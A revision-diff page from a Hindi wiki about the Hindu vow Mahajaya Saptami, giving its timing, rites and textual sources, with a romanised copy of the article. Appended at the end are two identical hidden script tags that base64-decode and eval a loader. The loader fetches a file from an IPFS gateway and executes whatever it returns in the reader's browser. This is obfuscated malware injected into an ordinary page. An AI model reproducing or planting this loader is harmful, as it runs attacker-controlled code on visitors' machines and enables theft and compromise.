Difference between revisions of "महाजय सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*जब शुक्ल सप्तमी पर [[सूर्य]] किसी राशि में प्रविष्ट होता है तो उसे महाजयसप्तमी कहा जाता है।
 
*जब शुक्ल सप्तमी पर [[सूर्य]] किसी राशि में प्रविष्ट होता है तो उसे महाजयसप्तमी कहा जाता है।
 
*इसमें स्नान, जप, होम, देवों एवं पितरों की पूजा से कोटिगुना फल मिलता है।
 
*इसमें स्नान, जप, होम, देवों एवं पितरों की पूजा से कोटिगुना फल मिलता है।
 
*इस दिन सूर्य प्रतिमा को घृत या दूध से स्नान कराने से व्यक्ति को सूर्यलोक की प्राप्ति होती है।  
 
*इस दिन सूर्य प्रतिमा को घृत या दूध से स्नान कराने से व्यक्ति को सूर्यलोक की प्राप्ति होती है।  
*इस दिन उपवास से स्वर्ग की प्राप्ति होती है।<ref>कृत्यकल्पतरु (व्रत0 135-136, हेमाद्रि, व्रत 1, 669)</ref>  
+
*इस दिन उपवास से स्वर्ग की प्राप्ति होती है।<ref>कृत्यकल्पतरु (व्रत0 135-136, हेमाद्रि, व्रत 1, 669</ref>  
 
*कृत्यकल्पतरु इस व्रत के स्रोत के विषय में मौन है, वह अधिकतर व्रत स्रोत के विषय में कोई प्रकाश नहीं डालता।  
 
*कृत्यकल्पतरु इस व्रत के स्रोत के विषय में मौन है, वह अधिकतर व्रत स्रोत के विषय में कोई प्रकाश नहीं डालता।  
*हेमाद्रि<ref>हेमाद्रि, (काल0 414) एवं तिथितत्व (145)</ref> ने [[ब्रह्म पुराण]] को उद्धृत किया है।  
+
*हेमाद्रि<ref>हेमाद्रि, (काल0 414) एवं तिथितत्त्व (145</ref> ने [[ब्रह्म पुराण]] को उद्धृत किया है।  
 
 
 
 
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:57, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jab shukl saptami par soory kisi rashi mean pravisht hota hai to use mahajayasaptami kaha jata hai.
  • isamean snan, jap, hom, devoan evan pitaroan ki pooja se kotiguna phal milata hai.
  • is din soory pratima ko ghrit ya doodh se snan karane se vyakti ko sooryalok ki prapti hoti hai.
  • is din upavas se svarg ki prapti hoti hai.[1]
  • krityakalpataru is vrat ke srot ke vishay mean maun hai, vah adhikatar vrat srot ke vishay mean koee prakash nahian dalata.
  • hemadri[2] ne brahm puran ko uddhrit kiya hai.

 


tika tippani aur sandarbh

  1. krityakalpataru (vrat0 135-136, hemadri, vrat 1, 669
  2. hemadri, (kal0 414) evan tithitattv (145

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>